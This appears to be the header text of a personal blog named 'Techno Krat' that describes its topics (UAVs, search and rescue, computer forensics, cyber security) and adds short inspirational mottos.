Musings about UAVs, search & rescue, computer forensics, cyber security, and the state of play in all .....

Life is beautiful

when the mind is full with love, you see beauty in every thing

Techno Krat

.... Dare To Try .......